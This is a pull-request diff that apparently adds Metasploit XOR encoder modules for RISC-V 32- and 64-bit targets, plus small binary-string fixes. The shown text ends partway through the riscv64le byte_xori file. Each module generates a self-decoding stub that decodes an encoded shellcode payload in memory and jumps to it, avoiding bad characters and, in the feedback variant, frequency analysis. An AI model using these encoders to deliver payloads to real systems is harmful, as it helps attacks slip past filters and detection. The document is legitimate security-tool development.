### PR TITLE
Add RISC-V XOR encoders for riscv32le and riscv64le

### DIFF
--- a/modules/encoders/riscv32le/byte_xori.rb
+++ b/modules/encoders/riscv32le/byte_xori.rb
@@ -1,0 +1,156 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder::Xor
+
+  Rank = NormalRanking
+
+  def initialize
+    super(
+      'Name' => 'Byte XORi Encoder',
+      'Description' => %q{
+        Byte XOR encoder for RISC-V 32-bit (Little Endian). Encodes the
+        payload byte-by-byte with a 1-byte XOR key using the xori
+        instruction. Useful when R-type XOR instruction bytes (0x33) are
+        bad characters.
+      },
+      'Author' => ['bcoles'],
+      'Arch' => ARCH_RISCV32LE,
+      'License' => MSF_LICENSE,
+      'Decoder' => {
+        'KeySize' => 1,
+        'BlockSize' => 1,
+        'KeyPack' => 'C'
+      }
+    )
+  end
+
+  #
+  # Returns the decoder stub that is adjusted for the size of
+  # the buffer being encoded.
+  #
+  def decoder_stub(state)
+    if state.badchars.to_s.include?("\x00")
+      raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
+    end
+
+    byte_count = state.buf.length
+    raise EncodingError, 'The payload being encoded is empty' if byte_count.zero?
+    raise EncodingError, "The payload being encoded is too long (#{state.buf.length} bytes)" if byte_count > 2047
+
+    xori_imm = find_xori_imm(state.key.to_i, state.badchars)
+
+    # Decoder stub layout (64 bytes = 16 instructions):
+    #
+    #   0x00: auipc  t0, 0             # t0 = address of this instruction
+    #   0x04: addi   t4, t0, 64        # t4 = start of encoded payload
+    #   0x08: addi   t2, x0, count     # t2 = number of bytes to decode
+    #   0x0c: addi   t0, t4, 0         # t0 = working pointer
+    #   0x10: lbu    t3, 0(t0)         # load encoded byte (unsigned)
+    #   0x14: xori   t3, t3, IMM       # XOR with key (low 8 bits of immediate)
+    #   0x18: sb     t3, 0(t0)         # store decoded byte
+    #   0x1c: addi   t0, t0, 1         # advance pointer
+    #   0x20: addi   t2, t2, -1        # decrement counter
+    #   0x24: bne    t2, x0, -0x14     # loop to 0x10
+    #   0x28: addi   a0, t4, 0         # cache flush start address
+    #   0x2c: addi   a1, t0, 0         # cache flush end address
+    #   0x30: addi   a2, x0, 0         # flags (0 = all harts)
+    #   0x34: addi   a7, x0, 259       # __NR_riscv_flush_icache
+    #   0x38: ecall                    # flush icache
+    #   0x3c: jalr   x0, t4, 0         # jump to decoded payload
+    #
+    [
+      0x00000297,                       # auipc  t0, 0
+      encode_addi(29, 5, 64),           # addi   t4, t0, 64
+      encode_addi(7, 0, byte_count),    # addi   t2, x0, count
+      encode_addi(5, 29, 0),            # addi   t0, t4, 0
+      encode_lbu(28, 5, 0),             # lbu    t3, 0(t0)
+      encode_xori_insn(28, 28, xori_imm), # xori t3, t3, imm
+      encode_sb(28, 5, 0),              # sb     t3, 0(t0)
+      encode_addi(5, 5, 1),             # addi   t0, t0, 1
+      encode_addi(7, 7, -1),            # addi   t2, t2, -1
+      encode_bne(7, 0, -20),            # bne    t2, x0, loop
+      encode_addi(10, 29, 0),           # addi   a0, t4, 0
+      encode_addi(11, 5, 0),            # addi   a1, t0, 0
+      encode_addi(12, 0, 0),            # addi   a2, x0, 0
+      encode_addi(17, 0, 259),          # addi   a7, x0, 259
+      0x00000073,                       # ecall
+      encode_jalr(0, 29, 0),            # jalr   x0, t4, 0
+    ].pack('V*')
+  end
+
+  #
+  # Verify that the candidate key produces a valid xori immediate
+  # whose instruction encoding avoids bad characters.
+  #
+  def find_key_verify(buf, key_bytes, badchars)
+    return false unless super
+
+    key = key_bytes_to_integer(key_bytes)
+    find_xori_imm(key, badchars)
+    true
+  rescue EncodingError
+    false
+  end
+
+  private
+
+  # Find a 12-bit immediate for the xori instruction that avoids bad characters
+  # in its encoding. Only the low 8 bits affect the XOR result since sb stores
+  # only the low byte, so bits [11:8] can be set freely.
+  def find_xori_imm(key, badchars)
+    # Try upper nibbles 1-15 first (avoids null byte in instruction word)
+    (1..15).each do |hi|
+      imm12 = (hi << 8) | (key & 0xFF)
+      bytes = [encode_xori_insn(28, 28, imm12)].pack('V')
+      return imm12 if Rex::Text.badchar_index(bytes, badchars).nil?
+    end
+    # Fallback: try with no upper bits
+    imm12 = key & 0xFF
+    bytes = [encode_xori_insn(28, 28, imm12)].pack('V')
+    return imm12 if Rex::Text.badchar_index(bytes, badchars).nil?
+
+    raise EncodingError, "The #{name} encoder failed to avoid bad characters in the xori instruction"
+  end
+
+  # I-type: ADDI rd, rs1, imm12
+  def encode_addi(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b0010011
+  end
+
+  # I-type: LBU rd, imm12(rs1)
+  def encode_lbu(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (0b100 << 12) | (rd << 7) | 0b0000011
+  end
+
+  # S-type: SB rs2, imm12(rs1)
+  def encode_sb(rs2, rs1, imm12)
+    imm = imm12 & 0xfff
+    (((imm >> 5) & 0x7f) << 25) | (rs2 << 20) | (rs1 << 15) | ((imm & 0x1f) << 7) | 0b0100011
+  end
+
+  # I-type: XORI rd, rs1, imm12
+  def encode_xori_insn(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (0b100 << 12) | (rd << 7) | 0b0010011
+  end
+
+  # B-type: BNE rs1, rs2, offset
+  def encode_bne(rs1, rs2, offset)
+    imm = offset & 0x1fff
+    bit12 = (imm >> 12) & 1
+    bit11 = (imm >> 11) & 1
+    hi6 = (imm >> 5) & 0x3f
+    lo4 = (imm >> 1) & 0xf
+    (bit12 << 31) | (hi6 << 25) | (rs2 << 20) | (rs1 << 15) |
+      (0b001 << 12) | (lo4 << 8) | (bit11 << 7) | 0b1100011
+  end
+
+  # I-type: JALR rd, rs1, imm12
+  def encode_jalr(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b1100111
+  end
+end

--- a/modules/encoders/riscv32le/byte_xori.rb
+++ b/modules/encoders/riscv32le/byte_xori.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Encoder::Xor
   # the buffer being encoded.
   #
   def decoder_stub(state)
-    if state.badchars.to_s.include?("\x00")
+    if state.badchars.to_s.include?("\x00".b)
       raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
     end
 

--- a/modules/encoders/riscv32le/longxor.rb
+++ b/modules/encoders/riscv32le/longxor.rb
@@ -1,0 +1,128 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder::Xor
+
+  Rank = NormalRanking
+
+  def initialize
+    super(
+      'Name' => 'XOR Encoder',
+      'Description' => %q{
+        Dword XOR encoder for RISC-V 32-bit (Little Endian). Encodes the
+        payload with a 4-byte XOR key.
+      },
+      'Author' => ['bcoles'],
+      'Arch' => ARCH_RISCV32LE,
+      'License' => MSF_LICENSE,
+      'Decoder' => {
+        'KeySize' => 4,
+        'BlockSize' => 4,
+        'KeyPack' => 'V'
+      }
+    )
+  end
+
+  #
+  # Returns the decoder stub that is adjusted for the size of
+  # the buffer being encoded.
+  #
+  def decoder_stub(state)
+    if state.badchars.to_s.include?("\x00")
+      raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
+    end
+
+    raise EncodingError, 'The payload is empty' if state.buf.empty?
+
+    block_count = state.buf.length / 4
+    raise EncodingError, "The payload being encoded is too long (#{state.buf.length} bytes)" if block_count > 2047
+    raise EncodingError, "The payload is not aligned to 4 bytes (#{state.buf.length} bytes)" if (state.buf.length % 4) != 0
+
+    # Decoder stub layout (72 bytes = 17 instructions + 4-byte key):
+    #
+    #   0x00: auipc  t0, 0             # t0 = address of this instruction
+    #   0x04: addi   t4, t0, 72        # t4 = start of encoded payload
+    #   0x08: lw     t1, 68(t0)        # t1 = XOR key (stored at end of stub)
+    #   0x0c: addi   t2, x0, count     # t2 = number of dwords to decode
+    #   0x10: addi   t0, t4, 0         # t0 = working pointer
+    #   0x14: lw     t3, 0(t0)         # load encoded dword
+    #   0x18: xor    t3, t3, t1        # XOR with key
+    #   0x1c: sw     t3, 0(t0)         # store decoded dword
+    #   0x20: addi   t0, t0, 4         # advance pointer
+    #   0x24: addi   t2, t2, -1        # decrement counter
+    #   0x28: bne    t2, x0, -0x14     # loop to 0x14
+    #   0x2c: addi   a0, t4, 0         # cache flush start address
+    #   0x30: addi   a1, t0, 0         # cache flush end address
+    #   0x34: addi   a2, x0, 0         # flags (0 = all harts)
+    #   0x38: addi   a7, x0, 259       # __NR_riscv_flush_icache
+    #   0x3c: ecall                    # flush icache
+    #   0x40: jalr   x0, t4, 0         # jump to decoded payload
+    #   0x44: <4-byte XOR key>
+    #
+    decoder = [
+      0x00000297,                     # auipc  t0, 0
+      encode_addi(29, 5, 72),         # addi   t4, t0, 72
+      encode_lw(6, 5, 68),            # lw     t1, 68(t0)
+      encode_addi(7, 0, block_count), # addi   t2, x0, count
+      encode_addi(5, 29, 0),          # addi   t0, t4, 0
+      encode_lw(28, 5, 0),            # lw     t3, 0(t0)
+      encode_xor(28, 28, 6),          # xor    t3, t3, t1
+      encode_sw(28, 5, 0),            # sw     t3, 0(t0)
+      encode_addi(5, 5, 4),           # addi   t0, t0, 4
+      encode_addi(7, 7, -1),          # addi   t2, t2, -1
+      encode_bne(7, 0, -20),          # bne    t2, x0, loop
+      encode_addi(10, 29, 0),         # addi   a0, t4, 0
+      encode_addi(11, 5, 0),          # addi   a1, t0, 0
+      encode_addi(12, 0, 0),          # addi   a2, x0, 0
+      encode_addi(17, 0, 259),        # addi   a7, x0, 259
+      0x00000073,                     # ecall
+      encode_jalr(0, 29, 0),          # jalr   x0, t4, 0
+    ].pack('V*')
+
+    state.decoder_key_offset = decoder.length
+    decoder + "\x00\x00\x00\x00"
+  end
+
+  private
+
+  # I-type: ADDI rd, rs1, imm12
+  def encode_addi(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b0010011
+  end
+
+  # I-type: LW rd, imm12(rs1)
+  def encode_lw(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (0b010 << 12) | (rd << 7) | 0b0000011
+  end
+
+  # S-type: SW rs2, imm12(rs1)
+  def encode_sw(rs2, rs1, imm12)
+    imm = imm12 & 0xfff
+    (((imm >> 5) & 0x7f) << 25) | (rs2 << 20) | (rs1 << 15) | (0b010 << 12) | ((imm & 0x1f) << 7) | 0b0100011
+  end
+
+  # R-type: XOR rd, rs1, rs2
+  def encode_xor(rd, rs1, rs2)
+    (rs2 << 20) | (rs1 << 15) | (0b100 << 12) | (rd << 7) | 0b0110011
+  end
+
+  # B-type: BNE rs1, rs2, offset
+  def encode_bne(rs1, rs2, offset)
+    imm = offset & 0x1fff
+    bit12 = (imm >> 12) & 1
+    bit11 = (imm >> 11) & 1
+    hi6 = (imm >> 5) & 0x3f
+    lo4 = (imm >> 1) & 0xf
+    (bit12 << 31) | (hi6 << 25) | (rs2 << 20) | (rs1 << 15) |
+      (0b001 << 12) | (lo4 << 8) | (bit11 << 7) | 0b1100011
+  end
+
+  # I-type: JALR rd, rs1, imm12
+  def encode_jalr(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b1100111
+  end
+end

--- a/modules/encoders/riscv32le/longxor.rb
+++ b/modules/encoders/riscv32le/longxor.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Encoder::Xor
   # the buffer being encoded.
   #
   def decoder_stub(state)
-    if state.badchars.to_s.include?("\x00")
+    if state.badchars.to_s.include?("\x00".b)
       raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
     end
 
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Encoder::Xor
     ].pack('V*')
 
     state.decoder_key_offset = decoder.length
-    decoder + "\x00\x00\x00\x00"
+    decoder + "\x00\x00\x00\x00".b
   end
 
   private

--- a/modules/encoders/riscv32le/longxor_feedback.rb
+++ b/modules/encoders/riscv32le/longxor_feedback.rb
@@ -1,0 +1,171 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder::Xor
+
+  Rank = NormalRanking
+
+  def initialize
+    super(
+      'Name' => 'XOR Encoder with Cipher Feedback',
+      'Description' => %q{
+        Dword XOR encoder with cipher feedback for RISC-V 32-bit
+        (Little Endian). Each dword is XORed with the previous encoded
+        dword rather than a static key, creating a chained dependency
+        that makes the output more resistant to frequency analysis. The
+        first dword is XORed with the key to bootstrap the chain.
+      },
+      'Author' => ['bcoles'],
+      'Arch' => ARCH_RISCV32LE,
+      'License' => MSF_LICENSE,
+      'Decoder' => {
+        'KeySize' => 4,
+        'BlockSize' => 4,
+        'KeyPack' => 'V'
+      }
+    )
+  end
+
+  #
+  # Returns the decoder stub that is adjusted for the size of
+  # the buffer being encoded.
+  #
+  def decoder_stub(state)
+    if state.badchars.to_s.include?("\x00")
+      raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
+    end
+
+    raise EncodingError, 'The payload is empty' if state.buf.empty?
+
+    block_count = state.buf.length / 4
+    raise EncodingError, "The payload being encoded is too long (#{state.buf.length} bytes)" if block_count > 2047
+    raise EncodingError, "The payload is not aligned to 4 bytes (#{state.buf.length} bytes)" if (state.buf.length % 4) != 0
+
+    # Decoder stub layout (76 bytes = 18 instructions + 4-byte key):
+    #
+    #   0x00: auipc  t0, 0             # t0 = address of this instruction
+    #   0x04: addi   t4, t0, 76        # t4 = start of encoded payload
+    #   0x08: lw     t1, 72(t0)        # t1 = feedback value (initially the key)
+    #   0x0c: addi   t2, x0, count     # t2 = number of dwords to decode
+    #   0x10: addi   t0, t4, 0         # t0 = working pointer
+    #   0x14: lw     t5, 0(t0)         # load encoded dword into t5
+    #   0x18: xor    t3, t5, t1        # decoded = encoded XOR feedback
+    #   0x1c: sw     t3, 0(t0)         # store decoded dword
+    #   0x20: addi   t1, t5, 0         # feedback = previous encoded dword
+    #   0x24: addi   t0, t0, 4         # advance pointer
+    #   0x28: addi   t2, t2, -1        # decrement counter
+    #   0x2c: bne    t2, x0, -0x18     # loop to 0x14
+    #   0x30: addi   a0, t4, 0         # cache flush start address
+    #   0x34: addi   a1, t0, 0         # cache flush end address
+    #   0x38: addi   a2, x0, 0         # flags (0 = all harts)
+    #   0x3c: addi   a7, x0, 259       # __NR_riscv_flush_icache
+    #   0x40: ecall                    # flush icache
+    #   0x44: jalr   x0, t4, 0         # jump to decoded payload
+    #   0x48: <4-byte XOR key>
+    #
+    decoder = [
+      0x00000297,                     # auipc  t0, 0
+      encode_addi(29, 5, 76),         # addi   t4, t0, 76
+      encode_lw(6, 5, 72),            # lw     t1, 72(t0)
+      encode_addi(7, 0, block_count), # addi   t2, x0, count
+      encode_addi(5, 29, 0),          # addi   t0, t4, 0
+      encode_lw(30, 5, 0),            # lw     t5, 0(t0)
+      encode_xor(28, 30, 6),          # xor    t3, t5, t1
+      encode_sw(28, 5, 0),            # sw     t3, 0(t0)
+      encode_addi(6, 30, 0),          # addi   t1, t5, 0
+      encode_addi(5, 5, 4),           # addi   t0, t0, 4
+      encode_addi(7, 7, -1),          # addi   t2, t2, -1
+      encode_bne(7, 0, -24),          # bne    t2, x0, loop
+      encode_addi(10, 29, 0),         # addi   a0, t4, 0
+      encode_addi(11, 5, 0),          # addi   a1, t0, 0
+      encode_addi(12, 0, 0),          # addi   a2, x0, 0
+      encode_addi(17, 0, 259),        # addi   a7, x0, 259
+      0x00000073,                     # ecall
+      encode_jalr(0, 29, 0),          # jalr   x0, t4, 0
+    ].pack('V*')
+
+    state.decoder_key_offset = decoder.length
+    decoder + "\x00\x00\x00\x00"
+  end
+
+  #
+  # Initialize the feedback value prior to encoding.
+  #
+  def encode_begin(state)
+    @feedback = state.key.to_i
+  end
+
+  #
+  # Encode a block using XOR with cipher feedback. Each encoded
+  # dword becomes the XOR operand for the next block.
+  #
+  def encode_block(_state, block)
+    encoded_val = block.unpack1('V') ^ @feedback
+    @feedback = encoded_val
+    [encoded_val].pack('V')
+  end
+
+  #
+  # Verify that a candidate key remains valid once cipher feedback
+  # encoding has been applied across the full buffer.
+  #
+  def find_key_verify(buf, key_bytes, badchars)
+    return false unless super
+    return true if badchars.to_s.empty?
+
+    feedback = key_bytes_to_integer(key_bytes)
+
+    buf.bytes.each_slice(4) do |bytes|
+      block = bytes.pack('C*').ljust(4, "\x00")
+      encoded_val = block.unpack1('V') ^ feedback
+      return false unless has_badchars?([encoded_val].pack('V'), badchars).nil?
+
+      feedback = encoded_val
+    end
+
+    true
+  end
+
+  private
+
+  # I-type: ADDI rd, rs1, imm12
+  def encode_addi(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b0010011
+  end
+
+  # I-type: LW rd, imm12(rs1)
+  def encode_lw(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (0b010 << 12) | (rd << 7) | 0b0000011
+  end
+
+  # S-type: SW rs2, imm12(rs1)
+  def encode_sw(rs2, rs1, imm12)
+    imm = imm12 & 0xfff
+    (((imm >> 5) & 0x7f) << 25) | (rs2 << 20) | (rs1 << 15) | (0b010 << 12) | ((imm & 0x1f) << 7) | 0b0100011
+  end
+
+  # R-type: XOR rd, rs1, rs2
+  def encode_xor(rd, rs1, rs2)
+    (rs2 << 20) | (rs1 << 15) | (0b100 << 12) | (rd << 7) | 0b0110011
+  end
+
+  # B-type: BNE rs1, rs2, offset
+  def encode_bne(rs1, rs2, offset)
+    imm = offset & 0x1fff
+    bit12 = (imm >> 12) & 1
+    bit11 = (imm >> 11) & 1
+    hi6 = (imm >> 5) & 0x3f
+    lo4 = (imm >> 1) & 0xf
+    (bit12 << 31) | (hi6 << 25) | (rs2 << 20) | (rs1 << 15) |
+      (0b001 << 12) | (lo4 << 8) | (bit11 << 7) | 0b1100011
+  end
+
+  # I-type: JALR rd, rs1, imm12
+  def encode_jalr(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b1100111
+  end
+end

--- a/modules/encoders/riscv32le/longxor_feedback.rb
+++ b/modules/encoders/riscv32le/longxor_feedback.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Encoder::Xor
   # the buffer being encoded.
   #
   def decoder_stub(state)
-    if state.badchars.to_s.include?("\x00")
+    if state.badchars.to_s.include?("\x00".b)
       raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
     end
 
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Encoder::Xor
     ].pack('V*')
 
     state.decoder_key_offset = decoder.length
-    decoder + "\x00\x00\x00\x00"
+    decoder + "\x00\x00\x00\x00".b
   end
 
   #
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Encoder::Xor
     feedback = key_bytes_to_integer(key_bytes)
 
     buf.bytes.each_slice(4) do |bytes|
-      block = bytes.pack('C*').ljust(4, "\x00")
+      block = bytes.pack('C*').ljust(4, "\x00".b)
       encoded_val = block.unpack1('V') ^ feedback
       return false unless has_badchars?([encoded_val].pack('V'), badchars).nil?
 

--- a/modules/encoders/riscv32le/longxor_tag.rb
+++ b/modules/encoders/riscv32le/longxor_tag.rb
@@ -1,0 +1,145 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder::Xor
+
+  Rank = LowRanking
+
+  def initialize
+    super(
+      'Name' => 'Dword XOR Encoder (Tag-based)',
+      'Description' => %q{
+        Dword XOR encoder for RISC-V 32-bit (Little Endian) using a
+        tag-based terminator rather than an encoded length. The decoder
+        loop XORs each dword and stops when the result is zero (the
+        sentinel). This avoids encoding the payload length in the stub,
+        eliminating a source of bad character conflicts.
+
+        Note: payloads containing 4-byte aligned zero dwords will cause
+        early loop termination due to collision with the sentinel value.
+      },
+      'Author' => ['bcoles'],
+      'Arch' => ARCH_RISCV32LE,
+      'License' => MSF_LICENSE,
+      'Decoder' => {
+        'KeySize' => 4,
+        'BlockSize' => 4,
+        'KeyPack' => 'V'
+      }
+    )
+  end
+
+  #
+  # Returns the decoder stub that is adjusted for the size of
+  # the buffer being encoded.
+  #
+  def decoder_stub(state)
+    if state.badchars.to_s.include?("\x00")
+      raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
+    end
+
+    raise EncodingError, 'The payload is empty' if state.buf.empty?
+    raise EncodingError, "The payload is not aligned to 4 bytes (#{state.buf.length} bytes)" if (state.buf.length % 4) != 0
+
+    # The sentinel-based loop terminates when a decoded dword is zero.
+    # A zero dword in the raw payload will always decode to zero regardless
+    # of the key, causing early termination. Detect this upfront.
+    state.buf.scan(/.{4}/m).each_with_index do |block, idx|
+      if block.unpack1('V') == 0
+        raise EncodingError, "Payload contains a zero dword at offset #{idx * 4}; use riscv32le/longxor instead"
+      end
+    end
+
+    # Decoder stub layout (64 bytes = 15 instructions + 4-byte key):
+    #
+    #   0x00: auipc  t0, 0             # t0 = address of this instruction
+    #   0x04: lw     t1, 60(t0)        # t1 = XOR key (stored at end of stub)
+    #   0x08: addi   t4, t0, 64        # t4 = start of encoded payload
+    #   0x0c: addi   t0, t4, 0         # t0 = working pointer
+    #   0x10: lw     t3, 0(t0)         # load encoded dword
+    #   0x14: xor    t3, t3, t1        # XOR with key
+    #   0x18: sw     t3, 0(t0)         # store decoded dword
+    #   0x1c: addi   t0, t0, 4         # advance pointer
+    #   0x20: bne    t3, x0, -0x10     # loop to 0x10 if non-zero (sentinel = 0)
+    #   0x24: addi   a0, t4, 0         # cache flush start address
+    #   0x28: addi   a1, t0, 0         # cache flush end address
+    #   0x2c: addi   a2, x0, 0         # flags (0 = all harts)
+    #   0x30: addi   a7, x0, 259       # __NR_riscv_flush_icache
+    #   0x34: ecall                    # flush icache
+    #   0x38: jalr   x0, t4, 0         # jump to decoded payload
+    #   0x3c: <4-byte XOR key>
+    #
+    decoder = [
+      0x00000297,                     # auipc  t0, 0
+      encode_lw(6, 5, 60),            # lw     t1, 60(t0)
+      encode_addi(29, 5, 64),         # addi   t4, t0, 64
+      encode_addi(5, 29, 0),          # addi   t0, t4, 0
+      encode_lw(28, 5, 0),            # lw     t3, 0(t0)
+      encode_xor(28, 28, 6),          # xor    t3, t3, t1
+      encode_sw(28, 5, 0),            # sw     t3, 0(t0)
+      encode_addi(5, 5, 4),           # addi   t0, t0, 4
+      encode_bne(28, 0, -16),         # bne    t3, x0, loop
+      encode_addi(10, 29, 0),         # addi   a0, t4, 0
+      encode_addi(11, 5, 0),          # addi   a1, t0, 0
+      encode_addi(12, 0, 0),          # addi   a2, x0, 0
+      encode_addi(17, 0, 259),        # addi   a7, x0, 259
+      0x00000073,                     # ecall
+      encode_jalr(0, 29, 0),          # jalr   x0, t4, 0
+    ].pack('V*')
+
+    state.decoder_key_offset = decoder.length
+    decoder + "\x00\x00\x00\x00"
+  end
+
+  #
+  # Append the XOR key as a sentinel after the encoded payload.
+  # When the decoder XORs this with the key, the result is zero,
+  # terminating the decode loop.
+  #
+  def encode_end(state)
+    state.encoded += [state.key.to_i].pack('V')
+  end
+
+  private
+
+  # I-type: ADDI rd, rs1, imm12
+  def encode_addi(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b0010011
+  end
+
+  # I-type: LW rd, imm12(rs1)
+  def encode_lw(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (0b010 << 12) | (rd << 7) | 0b0000011
+  end
+
+  # S-type: SW rs2, imm12(rs1)
+  def encode_sw(rs2, rs1, imm12)
+    imm = imm12 & 0xfff
+    (((imm >> 5) & 0x7f) << 25) | (rs2 << 20) | (rs1 << 15) | (0b010 << 12) | ((imm & 0x1f) << 7) | 0b0100011
+  end
+
+  # R-type: XOR rd, rs1, rs2
+  def encode_xor(rd, rs1, rs2)
+    (rs2 << 20) | (rs1 << 15) | (0b100 << 12) | (rd << 7) | 0b0110011
+  end
+
+  # B-type: BNE rs1, rs2, offset
+  def encode_bne(rs1, rs2, offset)
+    imm = offset & 0x1fff
+    bit12 = (imm >> 12) & 1
+    bit11 = (imm >> 11) & 1
+    hi6 = (imm >> 5) & 0x3f
+    lo4 = (imm >> 1) & 0xf
+    (bit12 << 31) | (hi6 << 25) | (rs2 << 20) | (rs1 << 15) |
+      (0b001 << 12) | (lo4 << 8) | (bit11 << 7) | 0b1100011
+  end
+
+  # I-type: JALR rd, rs1, imm12
+  def encode_jalr(rd, rs1, imm12)
+    ((imm12 & 0xfff) << 20) | (rs1 << 15) | (rd << 7) | 0b1100111
+  end
+end

--- a/modules/encoders/riscv32le/longxor_tag.rb
+++ b/modules/encoders/riscv32le/longxor_tag.rb
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Encoder::Xor
   # the buffer being encoded.
   #
   def decoder_stub(state)
-    if state.badchars.to_s.include?("\x00")
+    if state.badchars.to_s.include?("\x00".b)
       raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
     end
 
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Encoder::Xor
     ].pack('V*')
 
     state.decoder_key_offset = decoder.length
-    decoder + "\x00\x00\x00\x00"
+    decoder + "\x00\x00\x00\x00".b
   end
 
   #

--- a/modules/encoders/riscv64le/byte_xori.rb
+++ b/modules/encoders/riscv64le/byte_xori.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Encoder::Xor
   # the buffer being encoded.
   #
   def decoder_stub(state)
-    if state.badchars.to_s.include?("\x00")
+    if state.badchars.to_s.include?("\x00".b)
       raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
     end
 

--- a/modules/encoders/riscv64le/byte_xori.rb
+++ b/modules/encoders/riscv64le/byte_xori.rb
@@ -1,0 +1,156 @@
+# frozen_string_literal: true
+
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Encoder::Xor
+
+  Rank = NormalRanking
+
+  def initialize
+    super(
+      'Name' => 'Byte XORi Encoder',
+      'Description' => %q{
+        Byte XOR encoder for RISC-V 64-bit (Little Endian). Encodes the
+        payload byte-by-byte with a 1-byte XOR key using the xori
+        instruction. Useful when R-type XOR instruction bytes (0x33) are
+        bad characters.
+      },
+      'Author' => ['bcoles'],
+      'Arch' => ARCH_RISCV64LE,
+      'License' => MSF_LICENSE,
+      'Decoder' => {
+        'KeySize' => 1,
+        'BlockSize' => 1,
+        'KeyPack' => 'C'
+      }
+    )
+  end
+
+  #
+  # Returns the decoder stub that is adjusted for the size of
+  # the buffer being encoded.
+  #
+  def decoder_stub(state)
+    if state.badchars.to_s.include?("\x00")
+      raise EncodingError, 'The RISC-V decoder stub inherently contains null bytes (auipc, ecall)'
+    end
+
+    byte_count = state.buf.length
+    raise EncodingError, 'The payload being encoded is empty' if byte_count.zero?
+    raise EncodingError, "The payload being encoded is too long (#{state.buf.length} bytes)" if byte_count > 2047
+
+    xori_imm = find_xori_imm(state.key.to_i, state.badchars)
+
+    # Decoder stub layout (64 bytes = 16 instructions):
+    #
+    #   0x00: auipc  t0, 0             # t0 = address of this instruction
+    #   0x04: addi   t4, t0, 64        # t4 = start of encoded payload
+    #   0x08: addi   t2, x0, count     # t2 = number of bytes to decode
+    #   0x0c: addi   t0, t4, 0         # t0 = working pointer
+    #   0x10: lbu    t3, 0(t0)         # load encoded byte (unsigned)
+    #   0x14: xori   t3, t3, IMM       # XOR with key (low 8 bits of immediate)
+    #   0x18: sb     t3, 0(t0)         # store decoded byte
+    #   0x1c: addi   t0, t0, 1         # advance pointer
+    #   0x20: addi   t2, t2, -1        # decrement counter
+    #   0x24: bne    t2, x0, -0x14     # loop to 0x10
+    #   0x28: addi   a0, t4, 0         # cache flush start address
+    #   0x2c: addi   a1, t0, 0         # cache flush end address
+    #   0x30: addi   a2, x0, 0         # flags (0 = all harts)
+    #   0x34: addi   a7, x0, 259       # __NR_riscv_flush_icache
+    #   0x38: ecall                    # flush icache
+    #   0x3c: jalr   x0, t4, 0         # jump to decoded payload
+    #
+    [
+      0x00000297,                       # auipc  t0, 0
+      encode_addi(29, 5, 64),           # addi   t4, t0, 64
+      encode_addi(7, 0, byte_count),    # addi   t2, x0, count
+      encode_addi(5, 29, 0),            # addi   t0, t4, 0
+      encode_lbu(28, 5, 0),             # lbu    t3, 0(t0)
+      encode_xori_insn(28, 28, xori_imm), # xori t3, t3, imm
+      encode_sb(28, 5, 0),              # sb     t3, 0(t0)
+      encode_addi(5, 5, 1),             # addi   t0, t0, 1
+      encode_addi(7, 7, -1),            # addi   t2, t2, -1
+      encode_bne(7, 0, -20),            # bne    t2, x0, loop
+      encode_addi(10, 29, 0),           # addi   a0, t4, 0
+      encode_addi(11, 5, 0),            # addi   a1, t0, 0
+      encode_addi(12, 0, 0),            # addi   a2, x0, 0
+      encode_addi(17, 0, 259),          # addi   a7, x0, 259
+      0x00000073,                       # ecall
+      encode_jalr(0, 29, 0),            # jalr   x0, t4, 0
+    ].pack('V*')
+  end
+
+  #
+  # Verify that the candidate key produces a valid xori immediate
+  # whose instruction encoding avoids bad characters.
+  #
+  def find_key_verify(buf, key_bytes, badchars)
